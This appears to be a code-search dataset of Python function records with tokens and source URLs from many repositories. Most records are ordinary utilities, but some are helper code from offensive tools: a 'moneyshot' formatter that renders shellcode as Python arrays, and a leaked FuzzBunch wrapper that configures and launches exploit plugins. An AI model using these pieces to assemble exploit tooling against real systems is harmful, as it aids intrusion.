def add_burner_output(self, path, txhex, block_height, merkle_branch, block_index, write=True): """ merkle_branch = None means it was unavailable because of pruning """ if self._BURNER_OUTPUT_STORAGE_KEY not in self._storage.data: self._storage.data[self._BURNER_OUTPUT_STORAGE_KEY] = {} path = path.encode() txhex = unhexlify(txhex) if not merkle_branch: merkle_branch = self.MERKLE_BRANCH_UNAVAILABLE self._storage.data[self._BURNER_OUTPUT_STORAGE_KEY][path] = [txhex, block_height, merkle_branch, block_index] if write: self._storage.save()
[ "def", "add_burner_output", "(", "self", ",", "path", ",", "txhex", ",", "block_height", ",", "merkle_branch", ",", "block_index", ",", "write", "=", "True", ")", ":", "if", "self", ".", "_BURNER_OUTPUT_STORAGE_KEY", "not", "in", "self", ".", "_storage", "."...
https://github.com/JoinMarket-Org/joinmarket-clientserver/blob/8b3d21f226185e31aa10e8e16cdfc719cea4a98e/jmclient/jmclient/wallet.py#L2509-L2523
theislab/anndata
664e32b0aa6625fe593370d37174384c05abfd4e
anndata/_core/anndata.py
python
AnnData.varm_keys
(self)
return list(self._varm.keys())
List keys of variable annotation :attr:`varm`.
List keys of variable annotation :attr:`varm`.
[ "List", "keys", "of", "variable", "annotation", ":", "attr", ":", "varm", "." ]
def varm_keys(self) -> List[str]: """List keys of variable annotation :attr:`varm`.""" return list(self._varm.keys())
[ "def", "varm_keys", "(", "self", ")", "->", "List", "[", "str", "]", ":", "return", "list", "(", "self", ".", "_varm", ".", "keys", "(", ")", ")" ]
https://github.com/theislab/anndata/blob/664e32b0aa6625fe593370d37174384c05abfd4e/anndata/_core/anndata.py#L1013-L1015
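A minimal anndata sketch (shapes illustrative): varm entries are keyed arrays with one row per variable, and varm_keys lists their names.

import numpy as np
import anndata as ad

adata = ad.AnnData(np.ones((5, 3)))    # 5 observations x 3 variables
adata.varm["PCs"] = np.zeros((3, 2))   # one row per variable
print(adata.varm_keys())               # ['PCs']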
blasty/moneyshot
0541356cca38e57ec03a30b6dff1d38c0c7dfd00
outputter.py
python
python
(buf, array_name = 'shellcode', row_width = 16, fancy = False)
return out
[]
def python(buf, array_name = 'shellcode', row_width = 16, fancy = False): lines = [] out = "" for i in range(0, len(buf), row_width): j = 0 linebuf = '' while (j < row_width and (i+j) < len(buf)): linebuf += "\\x%02x" % ( ord(buf[i+j]) ) j = j + 1 lines.append(linebuf); for i in range(0, len(lines)-1): if fancy: if i == 0: out += array_name + " = " + colors.bold() + colors.fg('magenta') + "\"" else: out += array_name + " += " + colors.bold() + colors.fg('magenta') + "\"" out += colors.fg("red") + lines[i] out += colors.fg('magenta') + "\"\n" + colors.end() else: if i == 0: out += array_name + " = \"%s\"\n" % ( lines[i] ) else: out += array_name + " += \"%s\"\n" % ( lines[i] ) if fancy: out += array_name + " += " + colors.bold() + colors.fg('magenta') + "\"" out += colors.fg("red") + lines[len(lines)-1] out += colors.fg('magenta') + "\"" + colors.end() + ";" out += "\n\n" # out += "\t\"%s\";\n\n" % ( lines[len(lines)-1] ) else: out += array_name + " += \"%s\";\n\n" % ( lines[len(lines)-1] ) return out
[ "def", "python", "(", "buf", ",", "array_name", "=", "'shellcode'", ",", "row_width", "=", "16", ",", "fancy", "=", "False", ")", ":", "lines", "=", "[", "]", "out", "=", "\"\"", "for", "i", "in", "range", "(", "0", ",", "len", "(", "buf", ")", ...
https://github.com/blasty/moneyshot/blob/0541356cca38e57ec03a30b6dff1d38c0c7dfd00/outputter.py#L256-L293
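A hedged Python 2 usage sketch for the non-fancy path above (the fancy branch additionally needs the repo's colors helper; the byte string is an arbitrary example):

buf = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"   # Python 2 str of raw bytes
print(python(buf, array_name="sc", row_width=4, fancy=False))
# sc = "\x31\xc0\x50\x68"
# sc += "\x2f\x2f\x73\x68";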
akanimax/T2F
e0fc1876b9ecac22be294fefd85234ddf365549c
implementation/networks/InferSent/encoder/models.py
python
ClassificationNet.encode
(self, s1)
return emb
[]
def encode(self, s1): emb = self.encoder(s1) return emb
[ "def", "encode", "(", "self", ",", "s1", ")", ":", "emb", "=", "self", ".", "encoder", "(", "s1", ")", "return", "emb" ]
https://github.com/akanimax/T2F/blob/e0fc1876b9ecac22be294fefd85234ddf365549c/implementation/networks/InferSent/encoder/models.py#L890-L892
econ-ark/HARK
9562cafef854d9c3d6b4aba2540e3e442ba6ec6c
HARK/ConsumptionSaving/ConsAggShockModel.py
python
KrusellSmithEconomy.reset
(self)
Reset the economy to prepare for a new simulation. Sets the time index of aggregate shocks to zero and runs Market.reset().
Reset the economy to prepare for a new simulation. Sets the time index of aggregate shocks to zero and runs Market.reset().
[ "Reset", "the", "economy", "to", "prepare", "for", "a", "new", "simulation", ".", "Sets", "the", "time", "index", "of", "aggregate", "shocks", "to", "zero", "and", "runs", "Market", ".", "reset", "()", "." ]
def reset(self): """ Reset the economy to prepare for a new simulation. Sets the time index of aggregate shocks to zero and runs Market.reset(). """ self.Shk_idx = 0 Market.reset(self)
[ "def", "reset", "(", "self", ")", ":", "self", ".", "Shk_idx", "=", "0", "Market", ".", "reset", "(", "self", ")" ]
https://github.com/econ-ark/HARK/blob/9562cafef854d9c3d6b4aba2540e3e442ba6ec6c/HARK/ConsumptionSaving/ConsAggShockModel.py#L2886-L2892
LabPy/lantz
3e878e3f765a4295b0089d04e241d4beb7b8a65b
lantz/drivers/ni/daqmx/base.py
python
Task.configure_trigger_analog_edge_start
(self, source, slope='rising', level=1.0)
Configures the task to start acquiring or generating samples when an analog signal crosses the level you specify. :param source: The name of a channel or terminal where there is an analog signal to use as the source of the trigger. For E Series devices, if you use a channel name, the channel must be the first channel in the task. The only terminal you can use for E Series devices is PFI0. :param slope: Specifies on which slope of the signal to start acquiring or generating samples when the signal crosses trigger level: 'rising' - Trigger on the rising slope of the signal. 'falling' - Trigger on the falling slope of the signal. :param level: The threshold at which to start acquiring or generating samples. Specify this value in the units of the measurement or generation. Use trigger slope to specify on which slope to trigger at this threshold.
Configures the task to start acquiring or generating samples when an analog signal crosses the level you specify.
[ "Configures", "the", "task", "to", "start", "acquiring", "or", "generating", "samples", "when", "an", "analog", "signal", "crosses", "the", "level", "you", "specify", "." ]
def configure_trigger_analog_edge_start(self, source, slope='rising', level=1.0): """ Configures the task to start acquiring or generating samples when an analog signal crosses the level you specify. :param source: The name of a channel or terminal where there is an analog signal to use as the source of the trigger. For E Series devices, if you use a channel name, the channel must be the first channel in the task. The only terminal you can use for E Series devices is PFI0. :param slope: Specifies on which slope of the signal to start acquiring or generating samples when the signal crosses trigger level: 'rising' - Trigger on the rising slope of the signal. 'falling' - Trigger on the falling slope of the signal. :param level: The threshold at which to start acquiring or generating samples. Specify this value in the units of the measurement or generation. Use trigger slope to specify on which slope to trigger at this threshold. """ self.lib.CfgAnlgEdgeStartTrig(source, slope, level)
[ "def", "configure_trigger_analog_edge_start", "(", "self", ",", "source", ",", "slope", "=", "'rising'", ",", "level", "=", "1.0", ")", ":", "self", ".", "lib", ".", "CfgAnlgEdgeStartTrig", "(", "source", ",", "slope", ",", "level", ")" ]
https://github.com/LabPy/lantz/blob/3e878e3f765a4295b0089d04e241d4beb7b8a65b/lantz/drivers/ni/daqmx/base.py#L873-L903
git-cola/git-cola
b48b8028e0c3baf47faf7b074b9773737358163d
cola/widgets/toolbar.py
python
ToolbarTreeWidget.__init__
(self, parent)
[]
def __init__(self, parent): standard.TreeView.__init__(self, parent) self.setDragEnabled(True) self.setDragDropMode(QtWidgets.QAbstractItemView.DragOnly) self.setSelectionMode(QtWidgets.QAbstractItemView.SingleSelection) self.setDropIndicatorShown(True) self.setRootIsDecorated(True) self.setHeaderHidden(True) self.setAlternatingRowColors(False) self.setSortingEnabled(False) self.setModel(QtGui.QStandardItemModel())
[ "def", "__init__", "(", "self", ",", "parent", ")", ":", "standard", ".", "TreeView", ".", "__init__", "(", "self", ",", "parent", ")", "self", ".", "setDragEnabled", "(", "True", ")", "self", ".", "setDragDropMode", "(", "QtWidgets", ".", "QAbstractItemVi...
https://github.com/git-cola/git-cola/blob/b48b8028e0c3baf47faf7b074b9773737358163d/cola/widgets/toolbar.py#L517-L529
mfarragher/appelpy
6ba8b123abb8b4e9d5968841b8ce9eb5088d763b
appelpy/linear_model.py
python
WLS.results
(self)
return self._results
statsmodels.regression.linear_model.RegressionResultsWrapper object The object contains many details on the fit of the regression model. There are dozens of attributes that store such information. For a neater summary of the model, use these class attributes: - results_output: the object returned by results.summary() - model_selection_stats: an assortment of measures contained in results, which are used commonly for model selection (e.g. AIC, R-squared)
statsmodels.regression.linear_model.RegressionResultsWrapper object The object contains many details on the fit of the regression model. There are dozens of attributes that store such information.
[ "statsmodels", ".", "regression", ".", "linear_model", ".", "RegressionResultsWrapper", "object", "The", "object", "contains", "many", "details", "on", "the", "fit", "of", "the", "regression", "model", ".", "There", "are", "dozens", "of", "attributes", "that", "...
def results(self): """statsmodels.regression.linear_model.RegressionResultsWrapper object The object contains many details on the fit of the regression model. There are dozens of attributes that store such information. For a neater summary of the model, use these class attributes: - results_output: the object returned by results.summary() - model_selection_stats: an assortment of measures contained in results, which are used commonly for model selection (e.g. AIC, R-squared) """ return self._results
[ "def", "results", "(", "self", ")", ":", "return", "self", ".", "_results" ]
https://github.com/mfarragher/appelpy/blob/6ba8b123abb8b4e9d5968841b8ce9eb5088d763b/appelpy/linear_model.py#L203-L214
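The wrapped object is a statsmodels results instance; a direct statsmodels sketch of the attributes the docstring refers to (data is synthetic):

import numpy as np
import statsmodels.api as sm

rng = np.random.RandomState(0)
X = sm.add_constant(np.arange(10, dtype=float))
y = 2 * X[:, 1] + rng.normal(size=10)
res = sm.WLS(y, X, weights=np.ones(10)).fit()
print(res.summary())            # what results_output wraps
print(res.rsquared, res.aic)    # typical model-selection statistics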
x0rz/EQGRP_Lost_in_Translation
6692b1486f562f027567a49523b8c151a4050988
windows/fuzzbunch/coli.py
python
CommandlineWrapper.__call__
(self, argv)
Effectively "main" from Commandlinewrapper
Effectively "main" from Commandlinewrapper
[ "Effectively", "main", "from", "Commandlinewrapper" ]
def __call__(self, argv): """Effectively "main" from Commandlinewrapper""" logConfig = None context = {} rendezvous = None try: (opts, args) = self.__coli_parser.parse_args(argv) if opts.InConfig is None: raise ExploitConfigError("You must pass a valid --InConfig option") # Read the input config and create a truanchild Config object self.config = truantchild.Config([opts.InConfig]) # make sure the id from the binary matches the config if self.getID() != self.config.id: print "Mismatching configurations!!" return 1 # XXX Add the bit about help, line 215 inputs = self.config._inputParams outputs= self.config._outputParams constants = None # Fuzzbunch doesn't support these yet #pytrch.Params_parseCommandLine( inputs.parameters, len(sys.argv), sys.argv, doHelp) # Convert the options from Truanchild to easy-to-handle input for the plugin iOptions = self.tc2List( inputs ) oOptions = self.tc2Dict( outputs ) # add the params from the wrapper valid = self.validateParams(iOptions) # XXX Print the invalid options if opts.ValidateOnly is True: return 0 (fhNo, logConfig) = self.processWrapperParams( opts ) # Setup all of the existing sockets self.doRendezvousClient(inputs) retval = self.processParams(iOptions, constants, oOptions, context, logConfig) try: self.options2Tc( oOptions, outputs ) except Exception as e: # If this fails, the plugin was not successful print str(oOptions) print "Failed: {0}".format(e) return 1 # Add the output parameter for the rendezvous (rendezvous, sock) = self.addWrapperOutputParams( outputs, self.config.namespaceUri, self.config.schemaVersion ) exma.writeParamsToEM( fhNo, self.config.getMarshalledInConfig() ) # This sends us into a send/recv loop self.doRendezvousServer( rendezvous, sock ) self.cleanup( EDF_CLEANUP_WAIT, context, logConfig ) except Exception as e: print "Failed: {0}".format(e) raise
[ "def", "__call__", "(", "self", ",", "argv", ")", ":", "logConfig", "=", "None", "context", "=", "{", "}", "rendezvous", "=", "None", "try", ":", "(", "opts", ",", "args", ")", "=", "self", ".", "__coli_parser", ".", "parse_args", "(", "argv", ")", ...
https://github.com/x0rz/EQGRP_Lost_in_Translation/blob/6692b1486f562f027567a49523b8c151a4050988/windows/fuzzbunch/coli.py#L57-L117
gradientinstitute/aboleth
53a3de23dce4d607ffec92be936e83d2dd7ebb3c
aboleth/layers.py
python
EmbedVariational.__init__
(self, output_dim, n_categories, prior_std=1., learn_prior=False, full=False)
Create an instance of a variational dense embedding layer.
Create an instance of a variational dense embedding layer.
[ "Create", "an", "instance", "of", "a", "variational", "dense", "embedding", "layer", "." ]
def __init__(self, output_dim, n_categories, prior_std=1., learn_prior=False, full=False): """Create an instance of a variational dense embedding layer.""" assert n_categories >= 2, "Need 2 or more categories for embedding!" self.output_dim = output_dim self.n_categories = n_categories self.full = full self.prior_std0 = prior_std self.learn_prior = learn_prior
[ "def", "__init__", "(", "self", ",", "output_dim", ",", "n_categories", ",", "prior_std", "=", "1.", ",", "learn_prior", "=", "False", ",", "full", "=", "False", ")", ":", "assert", "n_categories", ">=", "2", ",", "\"Need 2 or more categories for embedding!\"", ...
https://github.com/gradientinstitute/aboleth/blob/53a3de23dce4d607ffec92be936e83d2dd7ebb3c/aboleth/layers.py#L681-L689
keiffster/program-y
8c99b56f8c32f01a7b9887b5daae9465619d0385
src/programy/storage/stores/nosql/mongo/store/properties.py
python
MongoRegexesStore.add_regex
(self, name, regex)
return self.add_property(name, regex)
[]
def add_regex(self, name, regex): return self.add_property(name, regex)
[ "def", "add_regex", "(", "self", ",", "name", ",", "regex", ")", ":", "return", "self", ".", "add_property", "(", "name", ",", "regex", ")" ]
https://github.com/keiffster/program-y/blob/8c99b56f8c32f01a7b9887b5daae9465619d0385/src/programy/storage/stores/nosql/mongo/store/properties.py#L163-L164
klen/aioauth-client
7672e66053cfd6973261f40741916d2fd52ff97e
aioauth_client/__init__.py
python
OAuth2Client.request
(self, method: str, url: str, params: t.Dict = None, headers: t.Dict = None, access_token: str = None, **options)
return self._request(method, url, headers=headers, params=params, **options)
Request OAuth2 resource.
Request OAuth2 resource.
[ "Request", "OAuth2", "resource", "." ]
def request(self, method: str, url: str, params: t.Dict = None, headers: t.Dict = None, access_token: str = None, **options) -> t.Awaitable[t.Union[t.Dict, str]]: """Request OAuth2 resource.""" url = self._get_url(url) headers = headers or { 'Accept': 'application/json', 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', } access_token = access_token or self.access_token if access_token: headers.setdefault('Authorization', 'Bearer %s' % access_token) return self._request(method, url, headers=headers, params=params, **options)
[ "def", "request", "(", "self", ",", "method", ":", "str", ",", "url", ":", "str", ",", "params", ":", "t", ".", "Dict", "=", "None", ",", "headers", ":", "t", ".", "Dict", "=", "None", ",", "access_token", ":", "str", "=", "None", ",", "*", "*"...
https://github.com/klen/aioauth-client/blob/7672e66053cfd6973261f40741916d2fd52ff97e/aioauth_client/__init__.py#L309-L321
wutianyiRosun/CGNet
cfccea377a6f0a659e807e8759c82dbffba02d7f
model/ESPNet.py
python
CBR.forward
(self, input)
return output
:param input: input feature map :return: transformed feature map
:param input: input feature map :return: transformed feature map
[ ":", "param", "input", ":", "input", "feature", "map", ":", "return", ":", "transformed", "feature", "map" ]
def forward(self, input): ''' :param input: input feature map :return: transformed feature map ''' output = self.conv(input) output = self.bn(output) output = self.act(output) return output
[ "def", "forward", "(", "self", ",", "input", ")", ":", "output", "=", "self", ".", "conv", "(", "input", ")", "output", "=", "self", ".", "bn", "(", "output", ")", "output", "=", "self", ".", "act", "(", "output", ")", "return", "output" ]
https://github.com/wutianyiRosun/CGNet/blob/cfccea377a6f0a659e807e8759c82dbffba02d7f/model/ESPNet.py#L26-L34
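A self-contained PyTorch sketch of the same Conv -> BN -> activation pattern (channel counts and the PReLU choice are illustrative, not necessarily ESPNet's exact configuration):

import torch
import torch.nn as nn

class ConvBNAct(nn.Module):
    def __init__(self, n_in, n_out, k_size, stride=1):
        super(ConvBNAct, self).__init__()
        pad = (k_size - 1) // 2
        self.conv = nn.Conv2d(n_in, n_out, k_size, stride, pad, bias=False)
        self.bn = nn.BatchNorm2d(n_out)
        self.act = nn.PReLU(n_out)

    def forward(self, x):
        return self.act(self.bn(self.conv(x)))

y = ConvBNAct(3, 16, 3)(torch.randn(1, 3, 32, 32))
print(y.shape)   # torch.Size([1, 16, 32, 32])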
sahana/eden
1696fa50e90ce967df69f66b571af45356cc18da
modules/s3db/hrm.py
python
hrm_competency_controller
()
return current.rest_controller("hrm", "competency", # @ToDo: Create these if-required #csv_stylesheet = ("hrm", "competency.xsl"), #csv_template = ("hrm", "competency"), )
RESTful CRUD controller - used for Searching for people by Skill - used for Adding/Editing on Profile page
RESTful CRUD controller - used for Searching for people by Skill - used for Adding/Editing on Profile page
[ "RESTful", "CRUD", "controller", "-", "used", "for", "Searching", "for", "people", "by", "Skill", "-", "used", "for", "Adding", "/", "Editing", "on", "Profile", "page" ]
def hrm_competency_controller(): """ RESTful CRUD controller - used for Searching for people by Skill - used for Adding/Editing on Profile page """ T = current.T s3db = current.s3db s3 = current.response.s3 def prep(r): if r.method in ("create", "create.popup", "update", "update.popup"): # Coming from Profile page? table = r.table get_vars = r.get_vars person_id = get_vars.get("~.person_id", None) if person_id: try: person_id = int(person_id) except ValueError: pass else: field = table.person_id field.default = person_id field.readable = field.writable = False # Additional filtering of the profile section by skill type skill_type_name = get_vars.get("~.skill_id$skill_type_id$name") if skill_type_name: ttable = s3db.hrm_skill_type query = (ttable.name == skill_type_name) rows = current.db(query).select(ttable.id) skill_type_ids = [row.id for row in rows] if skill_type_ids: field = table.skill_id requires = field.requires if isinstance(requires, IS_EMPTY_OR): requires = requires.other if hasattr(requires, "set_filter"): requires.set_filter(filterby = "skill_type_id", filter_opts = skill_type_ids, ) elif not r.id: filter_widgets = [ S3TextFilter(["person_id$first_name", "person_id$middle_name", "person_id$last_name", "person_id$hrm_human_resource.job_title_id$name", ], label = T("Search"), comment = T("You can search by job title or person name - enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons."), ), S3OptionsFilter("skill_id", label = T("Skills"), options = lambda: \ s3_get_filter_opts("hrm_skill", translate=True), ), S3OptionsFilter("competency_id", label = T("Competency"), options = lambda: \ s3_get_filter_opts("hrm_competency_rating", translate=True), ), ] s3db.configure("hrm_competency", filter_widgets = filter_widgets, list_fields = ["person_id", "skill_id", "competency_id", "comments", ], ) return True s3.prep = prep def postp(r, output): if r.interactive: # Custom action button to add the member to a team s3_action_buttons(r) args = ["[id]", "group_membership"] s3.actions.append({"label": str(T("Add to a Team")), "_class": "action-btn", "url": URL(f = "person", args = args, ), } ) return output s3.postp = postp return current.rest_controller("hrm", "competency", # @ToDo: Create these if-required #csv_stylesheet = ("hrm", "competency.xsl"), #csv_template = ("hrm", "competency"), )
[ "def", "hrm_competency_controller", "(", ")", ":", "T", "=", "current", ".", "T", "s3db", "=", "current", ".", "s3db", "s3", "=", "current", ".", "response", ".", "s3", "def", "prep", "(", "r", ")", ":", "if", "r", ".", "method", "in", "(", "\"crea...
https://github.com/sahana/eden/blob/1696fa50e90ce967df69f66b571af45356cc18da/modules/s3db/hrm.py#L7693-L7790
007gzs/dingtalk-sdk
7979da2e259fdbc571728cae2425a04dbc65850a
dingtalk/client/api/taobao.py
python
TbALiYun.ecs_aliyuncs_com_DescribeSecurityGroups_2013_01_10
( self, region_id, page_number='1', page_size='10' )
return self._top_request( "ecs.aliyuncs.com.DescribeSecurityGroups.2013-01-10", { "RegionId": region_id, "PageNumber": page_number, "PageSize": page_size } )
Query the security group list !!!This API has been taken offline in the official documentation; use with caution!!! Paginated query of the basic information of all user-defined security groups. Each page defaults to 10 entries, sorted by security group ID in descending order. Documentation: https://open-doc.dingtalk.com/docs/api.htm?apiId=22433 :param region_id: data center id :param page_number: current page number, starting from 1, default 1 :param page_size: number of rows per page for the paginated query, maximum 50, default 10
Query the security group list !!!This API has been taken offline in the official documentation; use with caution!!!
[ "Query", "the", "security", "group", "list", "!!!This", "API", "has", "been", "taken", "offline", "in", "the", "official", "documentation", ";", "use", "with", "caution", "!!!" ]
def ecs_aliyuncs_com_DescribeSecurityGroups_2013_01_10( self, region_id, page_number='1', page_size='10' ): """ Query the security group list !!!This API has been taken offline in the official documentation; use with caution!!! Paginated query of the basic information of all user-defined security groups. Each page defaults to 10 entries, sorted by security group ID in descending order. Documentation: https://open-doc.dingtalk.com/docs/api.htm?apiId=22433 :param region_id: data center id :param page_number: current page number, starting from 1, default 1 :param page_size: number of rows per page for the paginated query, maximum 50, default 10 """ return self._top_request( "ecs.aliyuncs.com.DescribeSecurityGroups.2013-01-10", { "RegionId": region_id, "PageNumber": page_number, "PageSize": page_size } )
[ "def", "ecs_aliyuncs_com_DescribeSecurityGroups_2013_01_10", "(", "self", ",", "region_id", ",", "page_number", "=", "'1'", ",", "page_size", "=", "'10'", ")", ":", "return", "self", ".", "_top_request", "(", "\"ecs.aliyuncs.com.DescribeSecurityGroups.2013-01-10\"", ",", ...
https://github.com/007gzs/dingtalk-sdk/blob/7979da2e259fdbc571728cae2425a04dbc65850a/dingtalk/client/api/taobao.py#L36921-L36945
eliben/pyelftools
8f7a0becaface09435c4374947548b7851e3d1a2
elftools/dwarf/lineprogram.py
python
LineProgram.__getitem__
(self, name)
return self.header[name]
Implement dict-like access to header entries
Implement dict-like access to header entries
[ "Implement", "dict", "-", "like", "access", "to", "header", "entries" ]
def __getitem__(self, name): """ Implement dict-like access to header entries """ return self.header[name]
[ "def", "__getitem__", "(", "self", ",", "name", ")", ":", "return", "self", ".", "header", "[", "name", "]" ]
https://github.com/eliben/pyelftools/blob/8f7a0becaface09435c4374947548b7851e3d1a2/elftools/dwarf/lineprogram.py#L121-L124
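The dict-like access above is how line-program header fields are typically read; a hedged pyelftools sketch (the path is a placeholder and the binary must contain DWARF info):

from elftools.elf.elffile import ELFFile

with open('a.out', 'rb') as f:            # placeholder path
    dwarf = ELFFile(f).get_dwarf_info()
    for cu in dwarf.iter_CUs():
        lp = dwarf.line_program_for_CU(cu)
        if lp is None:
            continue
        print(lp['version'], lp['line_base'], lp['line_range'])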
oddt/oddt
8cf555820d97a692ade81c101ebe10e28bcb3722
oddt/pandas.py
python
ChemDataFrame.to_sdf
(self, filepath_or_buffer=None, update_properties=True, molecule_column=None, columns=None)
return _mol_writer(self, filepath_or_buffer=filepath_or_buffer, update_properties=update_properties, fmt='sdf', molecule_column=molecule_column, columns=columns)
Write DataFrame to SDF file. .. versionadded:: 0.3 Parameters ---------- filepath_or_buffer : string or None File path update_properties : bool, optional (default=True) Switch to update properties from the DataFrames to the molecules while writing. molecule_column : string or None, optional (default='mol') Name of molecule column. If None the molecules will be skipped. columns : list or None, optional (default=None) A list of columns to write to file. If None then all available fields are written.
Write DataFrame to SDF file.
[ "Write", "DataFrame", "to", "SDF", "file", "." ]
def to_sdf(self, filepath_or_buffer=None, update_properties=True, molecule_column=None, columns=None): """Write DataFrame to SDF file. .. versionadded:: 0.3 Parameters ---------- filepath_or_buffer : string or None File path update_properties : bool, optional (default=True) Switch to update properties from the DataFrames to the molecules while writing. molecule_column : string or None, optional (default='mol') Name of molecule column. If None the molecules will be skipped. columns : list or None, optional (default=None) A list of columns to write to file. If None then all available fields are written. """ molecule_column = molecule_column or self._molecule_column return _mol_writer(self, filepath_or_buffer=filepath_or_buffer, update_properties=update_properties, fmt='sdf', molecule_column=molecule_column, columns=columns)
[ "def", "to_sdf", "(", "self", ",", "filepath_or_buffer", "=", "None", ",", "update_properties", "=", "True", ",", "molecule_column", "=", "None", ",", "columns", "=", "None", ")", ":", "molecule_column", "=", "molecule_column", "or", "self", ".", "_molecule_co...
https://github.com/oddt/oddt/blob/8cf555820d97a692ade81c101ebe10e28bcb3722/oddt/pandas.py#L379-L410
minio/minio-py
b3ba3bf99fe6b9ff2b28855550d6ab5345c134e3
minio/notificationconfig.py
python
TopicConfig.fromxml
(cls, element)
return cls( topic, events, config_id, prefix_filter_rule, suffix_filter_rule )
Create new object with values from XML element.
Create new object with values from XML element.
[ "Create", "new", "object", "with", "values", "from", "XML", "element", "." ]
def fromxml(cls, element): """Create new object with values from XML element.""" topic = findtext(element, "Topic", True) (events, config_id, prefix_filter_rule, suffix_filter_rule) = cls.parsexml(element) return cls( topic, events, config_id, prefix_filter_rule, suffix_filter_rule )
[ "def", "fromxml", "(", "cls", ",", "element", ")", ":", "topic", "=", "findtext", "(", "element", ",", "\"Topic\"", ",", "True", ")", "(", "events", ",", "config_id", ",", "prefix_filter_rule", ",", "suffix_filter_rule", ")", "=", "cls", ".", "parsexml", ...
https://github.com/minio/minio-py/blob/b3ba3bf99fe6b9ff2b28855550d6ab5345c134e3/minio/notificationconfig.py#L243-L254
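A rough round-trip sketch of the classmethod pattern above; whether minio's findtext accepts this namespace-less document, and which sibling elements parsexml insists on, depend on library internals not shown here, so treat the XML and the import as illustrative:

import xml.etree.ElementTree as ET
from minio.notificationconfig import TopicConfig   # assumed import path

doc = """<TopicConfiguration>
  <Topic>arn:aws:sns:us-east-1:1234:mytopic</Topic>
  <Event>s3:ObjectCreated:*</Event>
</TopicConfiguration>"""
config = TopicConfig.fromxml(ET.fromstring(doc))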
the4thdoctor/pg_chameleon
9d80212541559c8d0a42b3e7c1b2c67bb7606411
pg_chameleon/lib/sql_util.py
python
sql_token.parse_sql
(self, sql_string)
The method cleans and parses the sql string A regular expression replaces all the default value definitions with a space. Then the statements are split in a list using the statement separator; For each statement a set of regular expressions removes the comments, single and multi line. Parentheses are surrounded by spaces and commas are rewritten in order to get at least one space after the comma. The statement is then put on a single line and stripped. Different matches are performed on the statement. RENAME TABLE CREATE TABLE DROP TABLE ALTER TABLE ALTER INDEX DROP PRIMARY KEY TRUNCATE TABLE The match which is successful determines the parsing of the rest of the statement. Each parse builds a dictionary with at least two keys "name" and "command". Each statement parse comes with specific additional keys. When the token dictionary is complete it is added to the class list tokenised :param sql_string: The sql string with the sql statements.
The method cleans and parses the sql string A regular expression replaces all the default value definitions with a space. Then the statements are split in a list using the statement separator;
[ "The", "method", "cleans", "and", "parses", "the", "sql", "string", "A", "regular", "expression", "replaces", "all", "the", "default", "value", "definitions", "with", "a", "space", ".", "Then", "the", "statements", "are", "split", "in", "a", "list", "using",...
def parse_sql(self, sql_string): """ The method cleans and parses the sql string A regular expression replaces all the default value definitions with a space. Then the statements are split in a list using the statement separator; For each statement a set of regular expressions removes the comments, single and multi line. Parentheses are surrounded by spaces and commas are rewritten in order to get at least one space after the comma. The statement is then put on a single line and stripped. Different matches are performed on the statement. RENAME TABLE CREATE TABLE DROP TABLE ALTER TABLE ALTER INDEX DROP PRIMARY KEY TRUNCATE TABLE The match which is successful determines the parsing of the rest of the statement. Each parse builds a dictionary with at least two keys "name" and "command". Each statement parse comes with specific additional keys. When the token dictionary is complete it is added to the class list tokenised :param sql_string: The sql string with the sql statements. """ statements=sql_string.split(';') for statement in statements: stat_dic={} stat_cleanup=re.sub(r'/\*.*?\*/', '', statement, re.DOTALL) stat_cleanup=re.sub(r'--.*?\n', '', stat_cleanup) stat_cleanup=re.sub(r'[\b)\b]', ' ) ', stat_cleanup) stat_cleanup=re.sub(r'[\b(\b]', ' ( ', stat_cleanup) stat_cleanup=re.sub(r'[\b,\b]', ', ', stat_cleanup) stat_cleanup=stat_cleanup.replace('\n', ' ') stat_cleanup = re.sub("\([\w*\s*]\)", " ", stat_cleanup) stat_cleanup = stat_cleanup.strip() malter_rename = self.m_alter_rename_table.match(stat_cleanup) mrename_table = self.m_rename_table.match(stat_cleanup) mcreate_table = self.m_create_table.match(stat_cleanup) mdrop_table = self.m_drop_table.match(stat_cleanup) malter_table = self.m_alter_table.match(stat_cleanup) malter_index = self.m_alter_index.match(stat_cleanup) mdrop_primary = self.m_drop_primary.match(stat_cleanup) mtruncate_table = self.m_truncate_table.match(stat_cleanup) if malter_rename: stat_dic["command"] = "RENAME TABLE" stat_dic["name"] = malter_rename.group(2) stat_dic["new_name"] = malter_rename.group(3) self.tokenised.append(stat_dic) stat_dic = {} elif mrename_table: rename_list = self.parse_rename_table(mrename_table.group(2)) for rename_table in rename_list: stat_dic["command"] = "RENAME TABLE" stat_dic["name"] = rename_table[0] stat_dic["new_name"] = rename_table[1] self.tokenised.append(stat_dic) stat_dic = {} elif mcreate_table: command=' '.join(mcreate_table.group(1).split()).upper().strip() stat_dic["command"]=command stat_dic["name"]=mcreate_table.group(2) create_parsed=self.parse_create_table(stat_cleanup, stat_dic["name"]) stat_dic["columns"]=create_parsed["columns"] stat_dic["indices"]=create_parsed["indices"] elif mdrop_table: command=' '.join(mdrop_table.group(1).split()).upper().strip() stat_dic["command"]=command stat_dic["name"]=mdrop_table.group(2) elif mtruncate_table: command=' '.join(mtruncate_table.group(1).split()).upper().strip() stat_dic["command"]=command if mtruncate_table.group(3) == '': stat_dic["name"]=mtruncate_table.group(2) else: stat_dic["name"]=mtruncate_table.group(3) elif mdrop_primary: stat_dic["command"]="DROP PRIMARY KEY" stat_dic["name"]=mdrop_primary.group(1).strip().strip(',').replace('`', '').strip() elif malter_index: pass elif malter_table: stat_dic=self.parse_alter_table(malter_table) if len(stat_dic["alter_cmd"]) == 0: stat_dic = {} if stat_dic!={}: self.tokenised.append(stat_dic)
[ "def", "parse_sql", "(", "self", ",", "sql_string", ")", ":", "statements", "=", "sql_string", ".", "split", "(", "';'", ")", "for", "statement", "in", "statements", ":", "stat_dic", "=", "{", "}", "stat_cleanup", "=", "re", ".", "sub", "(", "r'/\\*.*?\\...
https://github.com/the4thdoctor/pg_chameleon/blob/9d80212541559c8d0a42b3e7c1b2c67bb7606411/pg_chameleon/lib/sql_util.py#L423-L514
